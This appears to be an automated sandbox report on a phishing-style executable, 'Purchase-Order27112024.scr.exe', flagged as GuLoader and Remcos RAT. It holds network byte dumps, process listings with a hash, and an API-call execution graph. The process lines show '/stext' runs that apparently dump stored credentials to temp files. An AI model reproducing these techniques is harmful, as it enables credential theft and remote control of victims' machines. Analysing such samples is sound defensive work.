2024-11-27 15:50:31 UTC | 16384 | IN | Data Raw: 9e dc ac b1 a9 97 d8 bd c5 4f b0 79 6b 3f bc f2 28 36 ae 1c e6 2a cc 0a 4e f8 6c ea cf c6 8b 70 ab ea 08 ae b5 8f a1 58 c6 c6 e6 a2 b6 46 9c bc d4 40 ba ab ec ef 9a b9 d1 c5 b3 a5 8f 7e 56 85 c1 37 d1 00 71 c1 18 d7 60 84 72 0d 62 c4 0a 2a 3b 78 52 4d d0 a9 f3 68 a7 84 03 35 45 18 7a 7e d8 79 47 ee 86 61 b0 18 6f 0b 81 a7 c4 7d 45 02 a7 06 cc b8 99 56 30 98 e2 16 c2 ae 58 29 1c 10 60 e5 83 02 c2 31 96 2c 23 d3 97 d0 58 7c 7d a8 d2 6c b9 9d 43 05 3d 69 33 25 65 41 62 51 e8 c2 35 13 14 01 b7 4a 6f 00 4a 31 ae e4 e4 f3 b1 58 50 07 52 dc 0d 36 4d 0e 65 2c 44 c3 f1 fb 93 64 13 92 b9 e4 7f d4 9a 53 2d ce 14 b1 fa be 09 3b 6d 45 2a ad 81 47 3d 3f 15 03 1f 11 43 52 48 c8 e5 be 1f 82 70 ff 9e 68 3b d8 e2 e1 02 9b 5a b8 72 05 0f 3f 71 f3 bd a6 1c 9b fd e1 e7 9b b6
Data Ascii: Oyk?(6*NlpXF@~V7q`rb*;xRMh5Ez~yGao}EV0X)`1,#X|}lC=i3%eAbQ5JoJ1XPR6Me,DdS-;mE*G=?CRHph;Zr?q
2024-11-27 15:50:31 UTC | 16384 | IN | Data Raw: de 96 aa aa ec 6d 55 d1 d0 c7 ed 9b 76 ba c7 3a 77 81 2a 08 76 5e 6a 7c c9 46 b6 86 18 00 27 18 57 99 cc 3b 68 15 1a 85 52 bb c3 6e 82 85 34 20 20 18 16 84 05 92 03 a4 56 9f 15 bb b2 d4 0b 11 9e 32 92 fe b9 64 ed 0f 38 a7 fd a4 1d a5 bf d2 36 c3 57 30 b0 97 8f a7 51 97 89 b9 ae 29 96 76 c0 74 23 09 11 c8 89 4b 21 3f 62 f7 cf 4c ff 98 a4 e9 d7 e3 6a 35 21 5e 93 04 14 15 d1 eb 4f 31 df e0 fb c3 d3 07 28 a4 56 95 20 61 3b 8e ae 99 5b 71 30 e1 40 7f 7a cb 8c 53 97 93 b3 0f 74 fd 0d 2a 67 2a f2 68 bf 72 4c cc 5f e0 91 e6 63 01 bb 4c 42 58 4e 04 18 ce 82 d6 8d c5 c9 57 c9 44 bc 94 4d 4f ee b6 8b 0b 65 f0 c3 18 8e 37 22 73 12 e1 87 5c a7 81 66 8a c5 8b 66 09 47 13 dd aa 48 56 d2 60 49 21 28 6c 4e ed be c1 02 6d b0 db ee 78 c1 95 0e 2f 70 f7 ba d7 df 30 04 3e e4
Data Ascii: mUv:w*v^j|F'W;hRn4 V2d86W0Q)vt#K!?bLj5!^O1(V a;[q0@zSt*g*hrL_cLBXNWDMOe7"s\ffGHV`I!(lNmx/p0>
2024-11-27 15:50:32 UTC | 16384 | IN | Data Raw: 33 d3 a8 f5 ec 2d e7 bc 97 bb e7 ac dc c8 29 62 14 27 a0 b6 b8 c3 26 8e fd 1b de 78 3e 43 d0 d8 dc 14 cb 9b 9a 8e 5a 54 78 2a 60 c6 4e ee 41 63 7f 70 d0 b8 a0 e6 93 71 3f d7 4b de 14 85 2a 44 a9 a3 84 0d 09 00 5b 9d 8f 36 72 69 99 1b 5a 7d bb 40 23 08 53 9f ad 65 da 62 24 4f ca 50 55 d1 1e 13 02 af 39 90 b8 ef 04 71 7c b2 98 22 90 1b 77 71 0a 69 04 ee 25 83 f0 5c 0c 51 77 6f cf e1 0f 41 3f 6c 5e 70 a8 3a b8 a0 7b 7e 06 0b ae 85 4c cf c0 98 96 0a 5c e1 bc 0f 0e 2a b3 36 e5 45 68 a2 5f dc c3 db e6 2c 41 d3 5c 39 87 d1 d9 fc 42 0a db 9a 35 86 1f 21 80 0a b8 69 38 34 6a a0 f1 40 35 0f 2d e1 47 21 bb ec 08 0f e7 77 0d 8a f1 b5 da 61 ed a4 a8 dc 47 40 d9 7a 9a 9c 44 87 1e 7c d1 82 d0 39 70 7c f4 ca dd e6 48 d3 fa 87 79 26 d1 48 c8 5b 62 4b f2 2f b9 1d 04 d2 4b
Data Ascii: 3-)b'&x>CZTx*`NAcpq?K*D[6riZ}@#Seb$OPU9q|"wqi%\QwoA?l^p:{~L\*6Eh_,A\9B5!i84j@5-G!waG@zD|9p|Hy&H[bK/K
2024-11-27 15:50:32 UTC | 16384 | IN | Data Raw: 14 71 43 32 7a 7a 17 d0 ed da 0e c0 59 97 dc c6 79 58 1f 57 8f 85 5d 17 e3 c3 fc ce 40 16 73 f6 e1 d9 52 04 18 b9 f0 ee 66 46 dd e8 a8 3d 95 9b c2 f1 39 32 82 f7 63 72 83 34 ff 36 5e 65 80 b1 8e e9 40 ca 64 8e c0 43 48 98 46 e2 ea ad 74 c1 e6 a3 7b f7 b3 69 d8 9d 8a 0c 5b 46 08 b4 64 9f b9 38 3b 69 06 c2 7a e5 a0 01 c9 61 75 59 8f b8 4c 94 ae d6 9a 44 be 28 cd 94 79 11 e3 7f 93 c1 f2 57 80 c9 d6 b9 f2 67 dd 2c 4e c4 57 3f e2 ef c6 31 44 32 62 25 a3 8c 1e 88 eb 2f a6 2d 97 d2 bd 91 cd 18 fe 55 14 37 a7 a5 c5 74 0c 4e c0 bb ce 2e b2 d2 ec f7 c4 5a e0 ea 2e e0 b1 de e7 0b 72 68 74 ea 5e 24 c6 fe 00 4b 0a 88 7c c7 3f 49 d2 46 29 dd 6b 4b 51 f3 22 4a c6 5d 7e 03 66 b3 6e 58 f9 aa 61 a8 fd 66 30 c7 39 b7 29 1b 08 22 3d 00 7d 1f 21 4e 45 f4 30 e4 7c cf c7 98 b9
Data Ascii: qC2zzYyXW]@sRfF=92cr46^e@dCHFt{i[Fd8;izauYLD(yWg,NW?1D2b%/-U7tN.Z.rht^$K|?IF)kKQ"J]~fnXaf09)"=}!NE0|



Target ID: 0
Start time: 10:49:57
Start date: 27/11/2024
Path: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
Imagebase: 0x400000
File size: 676'214 bytes
MD5 hash: 5E1C814FC675448C381899D325ABA145
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2227487287.000000000872C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:50:09
Start date: 27/11/2024
Path: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"
Imagebase: 0x400000
File size: 676'214 bytes
MD5 hash: 5E1C814FC675448C381899D325ABA145
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 6
Start time: 10:50:43
Start date: 27/11/2024
Path: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn"
Imagebase: 0x400000
File size: 676'214 bytes
MD5 hash: 5E1C814FC675448C381899D325ABA145
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 7
Start time: 10:50:43
Start date: 27/11/2024
Path: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll"
Imagebase: 0x400000
File size: 676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:10:50:43
                                                                                                    Start date:27/11/2024
                                                                                                    Path:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:676'214 bytes
                                                                                                    MD5 hash:5E1C814FC675448C381899D325ABA145
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true


Execution Graph

Execution Coverage:18.8%
Dynamic/Decrypted Code Coverage:13.9%
Signature Coverage:18.7%
Total number of Nodes:1520
Total number of Limit Nodes:36
execution_graph: [node and edge list of the interactive execution-graph viewer (1520 nodes, 36 limit nodes), rendered as a figure in the original report; the raw graph data is not reproduced here]
4600->4598 4604 100023de 4600->4604 4601->4598 4602->4598 4604->4598 4668 100025d9 4604->4668 4607 100028b6 4605->4607 4606 1000295b EnumWindows 4608 10002979 4606->4608 4607->4606 4609 10002a75 4608->4609 4610 10002a6a GetLastError 4608->4610 4609->4528 4610->4609 4612 10002296 4611->4612 4614 100017a7 4611->4614 4613 100022a8 GlobalAlloc 4612->4613 4612->4614 4613->4612 4614->4523 4619 10002661 4615->4619 4616 100026b2 GlobalAlloc 4620 100026d4 4616->4620 4617 100026c5 4618 100026ca GlobalSize 4617->4618 4617->4620 4618->4620 4619->4616 4619->4617 4620->4548 4622 10002b6a 4621->4622 4623 10002baa GlobalFree 4622->4623 4671 1000121b GlobalAlloc 4624->4671 4626 10002530 StringFromGUID2 4629 100024b3 4626->4629 4627 10002541 lstrcpynW 4627->4629 4628 1000250b MultiByteToWideChar 4628->4629 4629->4626 4629->4627 4629->4628 4630 10002554 wsprintfW 4629->4630 4631 10002571 GlobalFree 4629->4631 4632 100025ac GlobalFree 4629->4632 4633 10001272 2 API calls 4629->4633 4672 100012e1 4629->4672 4630->4629 4631->4629 4632->4537 4633->4629 4676 1000121b GlobalAlloc 4635->4676 4637 100015ba 4638 100015c7 lstrcpyW 4637->4638 4640 100015e1 4637->4640 4641 100015fb 4638->4641 4640->4641 4642 100015e6 wsprintfW 4640->4642 4643 10001272 4641->4643 4642->4641 4644 100012b5 GlobalFree 4643->4644 4645 1000127b GlobalAlloc lstrcpynW 4643->4645 4644->4546 4645->4644 4647 10001861 4646->4647 4648 1000247a 4646->4648 4647->4556 4647->4557 4648->4647 4649 10002496 GlobalFree 4648->4649 4649->4648 4651 10001272 2 API calls 4650->4651 4652 1000155e 4651->4652 4652->4550 4653->4564 4654->4568 4656 100015ad 4655->4656 4656->4592 4663 1000121b GlobalAlloc 4657->4663 4659 1000123b lstrcpynW 4659->4578 4660->4568 4661->4588 4662->4589 4663->4659 4665 100012c1 4664->4665 4666 1000122c 2 API calls 4665->4666 4667 100012df 4666->4667 4667->4596 4669 100025e7 VirtualAlloc 4668->4669 4670 1000263d 4668->4670 4669->4670 4670->4604 4671->4629 4673 100012ea 4672->4673 4674 1000130c 4672->4674 4673->4674 
4675 100012f0 lstrcpyW 4673->4675 4674->4629 4675->4674 4676->4637 5425 10001058 5427 10001074 5425->5427 5426 100010dd 5427->5426 5428 10001092 5427->5428 5429 10001516 GlobalFree 5427->5429 5430 10001516 GlobalFree 5428->5430 5429->5428 5431 100010a2 5430->5431 5432 100010b2 5431->5432 5433 100010a9 GlobalSize 5431->5433 5434 100010b6 GlobalAlloc 5432->5434 5435 100010c7 5432->5435 5433->5432 5436 1000153d 3 API calls 5434->5436 5437 100010d2 GlobalFree 5435->5437 5436->5435 5437->5426 5438 40159b 5439 402b3a 18 API calls 5438->5439 5440 4015a2 SetFileAttributesW 5439->5440 5441 4015b4 5440->5441 5442 40659d 5443 406421 5442->5443 5444 406d8c 5443->5444 5445 4064a2 GlobalFree 5443->5445 5446 4064ab GlobalAlloc 5443->5446 5447 406522 GlobalAlloc 5443->5447 5448 406519 GlobalFree 5443->5448 5445->5446 5446->5443 5446->5444 5447->5443 5447->5444 5448->5447 5449 40149e 5450 4014ac PostQuitMessage 5449->5450 5451 40223e 5449->5451 5450->5451 5452 4021a0 5453 402b3a 18 API calls 5452->5453 5454 4021a6 5453->5454 5455 402b3a 18 API calls 5454->5455 5456 4021af 5455->5456 5457 402b3a 18 API calls 5456->5457 5458 4021b8 5457->5458 5459 40628b 2 API calls 5458->5459 5460 4021c1 5459->5460 5461 4021d2 lstrlenW lstrlenW 5460->5461 5465 4021c5 5460->5465 5462 4051f2 25 API calls 5461->5462 5464 402210 SHFileOperationW 5462->5464 5463 4051f2 25 API calls 5466 4021cd 5463->5466 5464->5465 5464->5466 5465->5463 5465->5466 5467 100010e1 5476 10001111 5467->5476 5468 100011d8 GlobalFree 5469 100012ba 2 API calls 5469->5476 5470 100011d3 5470->5468 5471 10001164 GlobalAlloc 5471->5476 5472 100011f8 GlobalFree 5472->5476 5473 10001272 2 API calls 5475 100011c4 GlobalFree 5473->5475 5474 100012e1 lstrcpyW 5474->5476 5475->5476 5476->5468 5476->5469 5476->5470 5476->5471 5476->5472 5476->5473 5476->5474 5476->5475 5477 401b22 5478 401b73 5477->5478 5479 401b2f 5477->5479 5480 401b78 5478->5480 5481 401b9d GlobalAlloc 5478->5481 5484 401bb8 5479->5484 5485 401b46 5479->5485 5490 40223e 
5480->5490 5498 405f48 lstrcpynW 5480->5498 5483 405f6a 18 API calls 5481->5483 5482 405f6a 18 API calls 5486 402238 5482->5486 5483->5484 5484->5482 5484->5490 5496 405f48 lstrcpynW 5485->5496 5492 405724 MessageBoxIndirectW 5486->5492 5489 401b8a GlobalFree 5489->5490 5491 401b55 5497 405f48 lstrcpynW 5491->5497 5492->5490 5494 401b64 5499 405f48 lstrcpynW 5494->5499 5496->5491 5497->5494 5498->5489 5499->5490 5500 4029a2 SendMessageW 5501 4029c7 5500->5501 5502 4029bc InvalidateRect 5500->5502 5502->5501 4087 401924 4088 401926 4087->4088 4093 402b3a 4088->4093 4094 402b46 4093->4094 4095 405f6a 18 API calls 4094->4095 4097 402b67 4095->4097 4096 40192b 4099 4057d0 4096->4099 4097->4096 4098 4061dc 5 API calls 4097->4098 4098->4096 4138 405a9b 4099->4138 4102 4057f8 DeleteFileW 4104 401934 4102->4104 4103 40580f 4105 40593a 4103->4105 4152 405f48 lstrcpynW 4103->4152 4105->4104 4182 40628b FindFirstFileW 4105->4182 4107 405835 4108 405848 4107->4108 4109 40583b lstrcatW 4107->4109 4153 4059df lstrlenW 4108->4153 4110 40584e 4109->4110 4113 40585e lstrcatW 4110->4113 4115 405869 lstrlenW FindFirstFileW 4110->4115 4113->4115 4117 40592f 4115->4117 4119 40588b 4115->4119 4116 405958 4185 405993 lstrlenW CharPrevW 4116->4185 4117->4105 4123 405912 FindNextFileW 4119->4123 4131 4057d0 64 API calls 4119->4131 4133 4051f2 25 API calls 4119->4133 4157 405f48 lstrcpynW 4119->4157 4158 405788 4119->4158 4166 4051f2 4119->4166 4177 405de2 4119->4177 4121 405788 5 API calls 4124 40596a 4121->4124 4123->4119 4125 405928 FindClose 4123->4125 4126 405984 4124->4126 4127 40596e 4124->4127 4125->4117 4129 4051f2 25 API calls 4126->4129 4127->4104 4130 4051f2 25 API calls 4127->4130 4129->4104 4132 40597b 4130->4132 4131->4119 4134 405de2 40 API calls 4132->4134 4133->4123 4135 405982 4134->4135 4135->4104 4188 405f48 lstrcpynW 4138->4188 4140 405aac 4189 405a3e CharNextW CharNextW 4140->4189 4143 4057f0 4143->4102 4143->4103 4144 4061dc 5 API calls 4150 405ac2 4144->4150 4145 
405af3 lstrlenW 4146 405afe 4145->4146 4145->4150 4148 405993 3 API calls 4146->4148 4147 40628b 2 API calls 4147->4150 4149 405b03 GetFileAttributesW 4148->4149 4149->4143 4150->4143 4150->4145 4150->4147 4151 4059df 2 API calls 4150->4151 4151->4145 4152->4107 4154 4059ed 4153->4154 4155 4059f3 CharPrevW 4154->4155 4156 4059ff 4154->4156 4155->4154 4155->4156 4156->4110 4157->4119 4195 405b8f GetFileAttributesW 4158->4195 4161 4057b5 4161->4119 4162 4057a3 RemoveDirectoryW 4164 4057b1 4162->4164 4163 4057ab DeleteFileW 4163->4164 4164->4161 4165 4057c1 SetFileAttributesW 4164->4165 4165->4161 4167 40520d 4166->4167 4168 4052af 4166->4168 4169 405229 lstrlenW 4167->4169 4170 405f6a 18 API calls 4167->4170 4168->4119 4171 405252 4169->4171 4172 405237 lstrlenW 4169->4172 4170->4169 4174 405265 4171->4174 4175 405258 SetWindowTextW 4171->4175 4172->4168 4173 405249 lstrcatW 4172->4173 4173->4171 4174->4168 4176 40526b SendMessageW SendMessageW SendMessageW 4174->4176 4175->4174 4176->4168 4198 4062b2 GetModuleHandleA 4177->4198 4181 405e0a 4181->4119 4183 4062a1 FindClose 4182->4183 4184 405954 4182->4184 4183->4184 4184->4104 4184->4116 4186 40595e 4185->4186 4187 4059af lstrcatW 4185->4187 4186->4121 4187->4186 4188->4140 4190 405a5b 4189->4190 4193 405a6d 4189->4193 4192 405a68 CharNextW 4190->4192 4190->4193 4191 405a91 4191->4143 4191->4144 4192->4191 4193->4191 4194 4059c0 CharNextW 4193->4194 4194->4193 4196 405ba1 SetFileAttributesW 4195->4196 4197 405794 4195->4197 4196->4197 4197->4161 4197->4162 4197->4163 4199 4062d9 GetProcAddress 4198->4199 4200 4062ce LoadLibraryA 4198->4200 4201 405de9 4199->4201 4200->4199 4200->4201 4201->4181 4202 405c66 lstrcpyW 4201->4202 4203 405cb5 GetShortPathNameW 4202->4203 4204 405c8f 4202->4204 4206 405cca 4203->4206 4207 405ddc 4203->4207 4227 405bb4 GetFileAttributesW CreateFileW 4204->4227 4206->4207 4209 405cd2 wsprintfA 4206->4209 4207->4181 4208 405c99 CloseHandle GetShortPathNameW 4208->4207 4210 405cad 4208->4210 
4211 405f6a 18 API calls 4209->4211 4210->4203 4210->4207 4212 405cfa 4211->4212 4228 405bb4 GetFileAttributesW CreateFileW 4212->4228 4214 405d07 4214->4207 4215 405d16 GetFileSize GlobalAlloc 4214->4215 4216 405dd5 CloseHandle 4215->4216 4217 405d38 4215->4217 4216->4207 4229 405c37 ReadFile 4217->4229 4222 405d57 lstrcpyA 4225 405d79 4222->4225 4223 405d6b 4224 405b19 4 API calls 4223->4224 4224->4225 4226 405db0 SetFilePointer WriteFile GlobalFree 4225->4226 4226->4216 4227->4208 4228->4214 4230 405c55 4229->4230 4230->4216 4231 405b19 lstrlenA 4230->4231 4232 405b5a lstrlenA 4231->4232 4233 405b62 4232->4233 4234 405b33 lstrcmpiA 4232->4234 4233->4222 4233->4223 4234->4233 4235 405b51 CharNextA 4234->4235 4235->4232 5503 402224 5504 40223e 5503->5504 5505 40222b 5503->5505 5506 405f6a 18 API calls 5505->5506 5507 402238 5506->5507 5508 405724 MessageBoxIndirectW 5507->5508 5508->5504 5516 402729 5517 402730 5516->5517 5518 4029c7 5516->5518 5519 402736 FindClose 5517->5519 5519->5518 5520 401cab 5521 402b1d 18 API calls 5520->5521 5522 401cb2 5521->5522 5523 402b1d 18 API calls 5522->5523 5524 401cba GetDlgItem 5523->5524 5525 4024e8 5524->5525 5526 4042ae lstrcpynW lstrlenW 5527 4016af 5528 402b3a 18 API calls 5527->5528 5529 4016b5 GetFullPathNameW 5528->5529 5530 4016f1 5529->5530 5531 4016cf 5529->5531 5532 401706 GetShortPathNameW 5530->5532 5533 4029c7 5530->5533 5531->5530 5534 40628b 2 API calls 5531->5534 5532->5533 5535 4016e1 5534->5535 5535->5530 5537 405f48 lstrcpynW 5535->5537 5537->5530 4250 402331 4251 402337 4250->4251 4252 402b3a 18 API calls 4251->4252 4253 402349 4252->4253 4254 402b3a 18 API calls 4253->4254 4255 402353 RegCreateKeyExW 4254->4255 4256 40237d 4255->4256 4258 402793 4255->4258 4257 402398 4256->4257 4259 402b3a 18 API calls 4256->4259 4260 402b1d 18 API calls 4257->4260 4263 4023a4 4257->4263 4262 40238e lstrlenW 4259->4262 4260->4263 4261 4023bf RegSetValueExW 4265 4023d5 RegCloseKey 4261->4265 4262->4257 4263->4261 4267 
403062 4263->4267 4265->4258 4268 403072 SetFilePointer 4267->4268 4269 40308e 4267->4269 4268->4269 4282 40317d GetTickCount 4269->4282 4272 405c37 ReadFile 4273 4030ae 4272->4273 4274 40317d 43 API calls 4273->4274 4281 403139 4273->4281 4275 4030c5 4274->4275 4276 4030d5 4275->4276 4277 40313f ReadFile 4275->4277 4275->4281 4279 405c37 ReadFile 4276->4279 4280 403108 WriteFile 4276->4280 4276->4281 4277->4281 4279->4276 4280->4276 4280->4281 4281->4261 4283 4032e7 4282->4283 4284 4031ac 4282->4284 4285 402d1a 33 API calls 4283->4285 4295 40330f SetFilePointer 4284->4295 4291 403095 4285->4291 4287 4031b7 SetFilePointer 4293 4031dc 4287->4293 4291->4272 4291->4281 4292 403271 WriteFile 4292->4291 4292->4293 4293->4291 4293->4292 4294 4032c8 SetFilePointer 4293->4294 4296 4032f9 4293->4296 4299 4063ee 4293->4299 4306 402d1a 4293->4306 4294->4283 4295->4287 4297 405c37 ReadFile 4296->4297 4298 40330c 4297->4298 4298->4293 4300 406413 4299->4300 4303 40641b 4299->4303 4300->4293 4301 4064a2 GlobalFree 4302 4064ab GlobalAlloc 4301->4302 4302->4300 4302->4303 4303->4300 4303->4301 4303->4302 4304 406522 GlobalAlloc 4303->4304 4305 406519 GlobalFree 4303->4305 4304->4300 4304->4303 4305->4304 4307 402d43 4306->4307 4308 402d2b 4306->4308 4310 402d53 GetTickCount 4307->4310 4311 402d4b 4307->4311 4309 402d34 DestroyWindow 4308->4309 4314 402d3b 4308->4314 4309->4314 4313 402d61 4310->4313 4310->4314 4321 4062eb 4311->4321 4315 402d96 CreateDialogParamW ShowWindow 4313->4315 4316 402d69 4313->4316 4314->4293 4315->4314 4316->4314 4325 402cfe 4316->4325 4318 402d77 wsprintfW 4319 4051f2 25 API calls 4318->4319 4320 402d94 4319->4320 4320->4314 4322 406308 PeekMessageW 4321->4322 4323 406318 4322->4323 4324 4062fe DispatchMessageW 4322->4324 4323->4314 4324->4322 4326 402d0d 4325->4326 4327 402d0f MulDiv 4325->4327 4326->4327 4327->4318 4328 405331 4329 405352 GetDlgItem GetDlgItem GetDlgItem 4328->4329 4330 4054dd 4328->4330 4374 4041cf SendMessageW 4329->4374 4332 4054e6 
GetDlgItem CreateThread CloseHandle 4330->4332 4333 40550e 4330->4333 4332->4333 4377 4052c5 OleInitialize 4332->4377 4335 405539 4333->4335 4336 405525 ShowWindow ShowWindow 4333->4336 4337 40555e 4333->4337 4334 4053c3 4340 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4334->4340 4338 405545 4335->4338 4339 405599 4335->4339 4376 4041cf SendMessageW 4336->4376 4344 404201 8 API calls 4337->4344 4342 405573 ShowWindow 4338->4342 4343 40554d 4338->4343 4339->4337 4350 4055a7 SendMessageW 4339->4350 4348 405439 4340->4348 4349 40541d SendMessageW SendMessageW 4340->4349 4346 405593 4342->4346 4347 405585 4342->4347 4351 404173 SendMessageW 4343->4351 4345 40556c 4344->4345 4353 404173 SendMessageW 4346->4353 4352 4051f2 25 API calls 4347->4352 4354 40544c 4348->4354 4355 40543e SendMessageW 4348->4355 4349->4348 4350->4345 4356 4055c0 CreatePopupMenu 4350->4356 4351->4337 4352->4346 4353->4339 4358 40419a 19 API calls 4354->4358 4355->4354 4357 405f6a 18 API calls 4356->4357 4359 4055d0 AppendMenuW 4357->4359 4360 40545c 4358->4360 4361 405600 TrackPopupMenu 4359->4361 4362 4055ed GetWindowRect 4359->4362 4363 405465 ShowWindow 4360->4363 4364 405499 GetDlgItem SendMessageW 4360->4364 4361->4345 4366 40561b 4361->4366 4362->4361 4367 405488 4363->4367 4368 40547b ShowWindow 4363->4368 4364->4345 4365 4054c0 SendMessageW SendMessageW 4364->4365 4365->4345 4369 405637 SendMessageW 4366->4369 4375 4041cf SendMessageW 4367->4375 4368->4367 4369->4369 4370 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4369->4370 4372 405679 SendMessageW 4370->4372 4372->4372 4373 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4372->4373 4373->4345 4374->4334 4375->4364 4376->4335 4378 4041e6 SendMessageW 4377->4378 4379 4052e8 4378->4379 4382 40530f 4379->4382 4383 401389 2 API calls 4379->4383 4380 4041e6 SendMessageW 4381 405321 OleUninitialize 4380->4381 4382->4380 4383->4379 5538 404635 5539 404661 5538->5539 5540 404672 5538->5540 5599 405708 
GetDlgItemTextW 5539->5599 5541 40467e GetDlgItem 5540->5541 5548 4046dd 5540->5548 5544 404692 5541->5544 5543 40466c 5546 4061dc 5 API calls 5543->5546 5547 4046a6 SetWindowTextW 5544->5547 5551 405a3e 4 API calls 5544->5551 5545 4047c1 5597 404955 5545->5597 5601 405708 GetDlgItemTextW 5545->5601 5546->5540 5552 40419a 19 API calls 5547->5552 5548->5545 5553 405f6a 18 API calls 5548->5553 5548->5597 5550 404201 8 API calls 5555 404969 5550->5555 5556 40469c 5551->5556 5557 4046c2 5552->5557 5558 404751 SHBrowseForFolderW 5553->5558 5554 4047f1 5559 405a9b 18 API calls 5554->5559 5556->5547 5563 405993 3 API calls 5556->5563 5560 40419a 19 API calls 5557->5560 5558->5545 5561 404769 CoTaskMemFree 5558->5561 5562 4047f7 5559->5562 5564 4046d0 5560->5564 5565 405993 3 API calls 5561->5565 5602 405f48 lstrcpynW 5562->5602 5563->5547 5600 4041cf SendMessageW 5564->5600 5567 404776 5565->5567 5570 4047ad SetDlgItemTextW 5567->5570 5574 405f6a 18 API calls 5567->5574 5569 4046d6 5572 4062b2 3 API calls 5569->5572 5570->5545 5571 40480e 5573 4062b2 3 API calls 5571->5573 5572->5548 5581 404816 5573->5581 5575 404795 lstrcmpiW 5574->5575 5575->5570 5577 4047a6 lstrcatW 5575->5577 5576 404855 5603 405f48 lstrcpynW 5576->5603 5577->5570 5579 40485c 5580 405a3e 4 API calls 5579->5580 5582 404862 GetDiskFreeSpaceW 5580->5582 5581->5576 5585 4059df 2 API calls 5581->5585 5586 4048a7 5581->5586 5584 404885 MulDiv 5582->5584 5582->5586 5584->5586 5585->5581 5587 4049d6 21 API calls 5586->5587 5596 404904 5586->5596 5588 4048f6 5587->5588 5591 404906 SetDlgItemTextW 5588->5591 5592 4048fb 5588->5592 5589 40140b 2 API calls 5590 404927 5589->5590 5604 4041bc KiUserCallbackDispatcher 5590->5604 5591->5596 5594 4049d6 21 API calls 5592->5594 5594->5596 5595 404943 5595->5597 5605 4045ca 5595->5605 5596->5589 5596->5590 5597->5550 5599->5543 5600->5569 5601->5554 5602->5571 5603->5579 5604->5595 5606 4045d8 5605->5606 5607 4045dd SendMessageW 5605->5607 5606->5607 5607->5597 5608 
4027b5 5609 402b3a 18 API calls 5608->5609 5610 4027c3 5609->5610 5611 4027d9 5610->5611 5612 402b3a 18 API calls 5610->5612 5613 405b8f 2 API calls 5611->5613 5612->5611 5614 4027df 5613->5614 5634 405bb4 GetFileAttributesW CreateFileW 5614->5634 5616 4027ec 5617 402895 5616->5617 5618 4027f8 GlobalAlloc 5616->5618 5621 4028b0 5617->5621 5622 40289d DeleteFileW 5617->5622 5619 402811 5618->5619 5620 40288c CloseHandle 5618->5620 5635 40330f SetFilePointer 5619->5635 5620->5617 5622->5621 5624 402817 5625 4032f9 ReadFile 5624->5625 5626 402820 GlobalAlloc 5625->5626 5627 402830 5626->5627 5628 402864 WriteFile GlobalFree 5626->5628 5629 403062 46 API calls 5627->5629 5630 403062 46 API calls 5628->5630 5633 40283d 5629->5633 5631 402889 5630->5631 5631->5620 5632 40285b GlobalFree 5632->5628 5633->5632 5634->5616 5635->5624 5636 4028b6 5637 402b1d 18 API calls 5636->5637 5638 4028bc 5637->5638 5639 4028f8 5638->5639 5640 4028df 5638->5640 5644 402793 5638->5644 5642 402902 5639->5642 5643 40290e 5639->5643 5641 4028e4 5640->5641 5649 4028f5 5640->5649 5650 405f48 lstrcpynW 5641->5650 5645 402b1d 18 API calls 5642->5645 5646 405f6a 18 API calls 5643->5646 5645->5649 5646->5649 5649->5644 5651 405e8f wsprintfW 5649->5651 5650->5644 5651->5644 5652 404337 5653 40434f 5652->5653 5660 404469 5652->5660 5657 40419a 19 API calls 5653->5657 5654 4044d3 5655 4045a5 5654->5655 5656 4044dd GetDlgItem 5654->5656 5662 404201 8 API calls 5655->5662 5658 404566 5656->5658 5659 4044f7 